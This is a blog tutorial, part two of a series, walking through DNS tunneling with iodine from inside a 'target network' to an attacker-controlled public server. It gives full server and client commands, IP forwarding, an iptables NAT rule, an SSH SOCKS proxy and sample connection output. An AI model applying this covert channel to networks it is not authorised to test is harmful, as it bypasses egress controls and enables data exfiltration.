DNS Tunneling with iodine (part 2)

2 03 2014

In my previous article I described how to exploit a covert channel such as dns tunneling using iodine in conjunction with a dns server we are controlling.

Here I describe how to set up a dns tunnel without the need of a controlled dns server of our own.
That is, dns tunneling is made directly through iodine client and iodined server: this is a technically easier scenario to exploit compared with the one in the previous article.

Let’s assume we are phisically connected to a target network. In order to exploit a dns tunneling we have to verify that we can run dns queries to an arbitrary dns server, that is a dns server not included in the default network configurations of the target network (e.g open dns server, 208.67.222.222).

We use nslookup to verify this. Just set up >server 208.67.222.222 and run a query. If the query is successful, than we could exploit a dns tunnel.

What we need is a server with public IP (e.g 11.11.11.11) that we can reach. On that server, install iodine server (i.e iodined), than run:

iodined -fP mypassword 10.100.100.1 myexample.com

than enable port forwading on the kernel:

echo 1 > /proc/sys/net/ipv4/ip_forward

and enable iptables rules:

iptables -t nat -A POSTROUTING -s 172.16.0.0/24 -o eth0 -j MASQUERADE

Now you should turn your server into a SOCK proxy server. You can do it by typing:

ssh -N -D 0.0.0.0:1080 localhost

Now your server is ready.

You should now configure the client. Type:

iodine -fP mypassword -r 11.11.11.11 myexample.com

If it is working, you should see something like:

Opened dns0
Opened UDP socket
Sending DNS queries for myexample.com to 11.11.11.11
Autodetecting DNS query type (use -T to override).
Using DNS type NULL queries
Version ok, both using protocol v 0x00000502. You are user #0
Setting IP of dns0 to 10.100.100.2
Setting MTU of dns0 to 1130
Server tunnel IP is 10.100.100.1
Skipping raw mode
Using EDNS0 extension
Switching upstream to codec Base128
Server switched upstream to codec Base128
No alternative downstream codec available, using default (Raw)
Switching to lazy mode for low-latency
Server switched to lazy mode
Autoprobing max downstream fragment size... (skip with -m fragsize)
...768 not ok.. 384 ok.. 576 ok.. 672 ok.. 720 ok.. ...744 not ok.. 732 ok.. will use 732-2=730
Setting downstream fragment size to max 730...
Connection setup complete, transmitting data.

The tunnel is ready. Try pinging 10.100.100.1 to verify connection, then set up SOCKv5 proxy settings in your browser: IP 10.100.100.1 and port 1080.

You should now be browsing the internet.

Advertisements

Actions

Information

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s




%d bloggers like this: